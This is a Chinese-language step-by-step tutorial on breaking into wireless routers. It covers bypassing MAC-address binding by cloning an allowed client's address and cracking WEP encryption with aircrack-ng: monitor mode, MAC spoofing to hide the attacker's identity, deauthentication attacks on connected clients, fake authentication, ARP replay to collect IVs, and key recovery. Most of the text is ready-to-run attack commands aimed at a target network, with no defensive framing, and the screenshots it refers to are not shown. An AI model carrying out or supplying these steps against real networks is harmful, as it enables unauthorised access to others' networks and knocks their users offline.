无线渗透wep加密路由器

停掉网络服务

service network-manager stop

检查现在的环境适不适合使用airmon-ng

airmon-ng check

杀死可能冲突的进程

开启网卡monitor模式

airmon-ng start wlan0

airmon-ng stop wlan0mon可以结束掉monitor模式，之后还要激活ifconfig wlan0 up

可以看到已经看起了monitor模式了

我们需要修改mac地址，隐藏身份,修改之前先把无线网卡停掉，否则会提示正忙

ifconfig wlan0mon down

macchanger -m 00:11:22:33:44:55 wlan0mon

再开启无线网卡ifconfig wlan0mon up

查看当前的网卡信息ifconfig，发现修改好了mac地址

查看在无线网卡工作在哪个信道

在开启的时候可以设置信道

airmon-ng start wlan0 信道号

airmon-ng start wlan0 1

iwlist wlan0mon channel 查看信道时就会发现变成了信道1

开启侦听

可以指定信道，

也可以指定其中一个AP，并写入文件

station是一些终端设备

以上内容表示两个终端设备，，连到的路由器上

还探测到两个终端设备，，但是没有连接到路由器上,而probe表示尝试这个终端正在尝试连接的路由器名称

如果ap的信息过多，导致station的数据看不到。

可以按A键切换想要观察的部分

测试能否注入包 ，可以看到working，通信质量93%还可以。可以多测几次。

开始无线渗透攻击

1、渗透mac绑定的无线路由器

通过mac地址绑定这种方式防止无线渗透其实非常脆弱，因为不管是linux还是windows系统都可以轻而易举地改变mac地址。很多管理员不设密码，只通过绑定mac地址来共享网络服务，渗透者只需将mac地址修改为被允许的设备mac地址即可。

2、渗透wep加密的无线路由器

先要对无线路由进行侦听，当有连接权限的客户端重连路由器时获取到keystream，渗透者便可以利用这个keystream伪装成有连接权限的客户端和路由器建立关联，只有建立了这个关联才能进行下一步的操作。

所以渗透者需要断开客户端与路由器的连接，当客户端向路由器发起重连请求时，渗透者变获取到了keystream。

先开启对目标路由器的侦听并将侦听到的keystream保存下来

打开一个终端作为侦听终端

airodump-ng -c 信道号 --bssid 目标路由器mac -w 保存的文件名 网卡

打开另一个终端对客户端进行断网攻击

aireplay-ng -0(-0表示断网攻击) 攻击次数 -a 路由器mac -c 客户端mac 网卡名

成功攻击后，侦听终端会有以下变化，表明获取到了keystream

aireplay-ng -1(连接路由器) 重连时间(保持和路由器连接，告诉路由器这个机器一直存活着) -e 无线设备名 -y 获取到的keystream -a 路由器mac -h 渗透者mac 网卡名

就可以看到渗透者就连上了路由器，但是现在还不能上网

执行ARP重放攻击，获取IV值

aireplay-ng -3(arp重放攻击) -b 路由器mac -h 渗透者mac 网卡

但是我们看到并没有收到arp包

这里需要将客户端和路由器断开连接，断开连接后客户端会向路由器发送连接请求，渗透者截获这个请求连接的arp包，然后不断地向路由器发送这个arp包，路由器就会不断地返回ACK，在ACK中就包含有IV值，断开攻击和上面类似

aireplay-ng -0(-0表示断网攻击) 攻击次数 -a 路由器mac -c 客户端mac 网卡名

然后就开始获取到arp包了，ACK中就包含有IV值

如果密码设的64位建议抓20万个IV值，128位建议抓到150万个IV值以上，但是我们可以在获取IV值得同时，对路由器进行破解

aircrack-ng cap文件

然后就获取到了密码！

注意渗透者要和路由器处在同一个信道，尽量靠近路由器，有时要使用真实的mac,mac格式要正确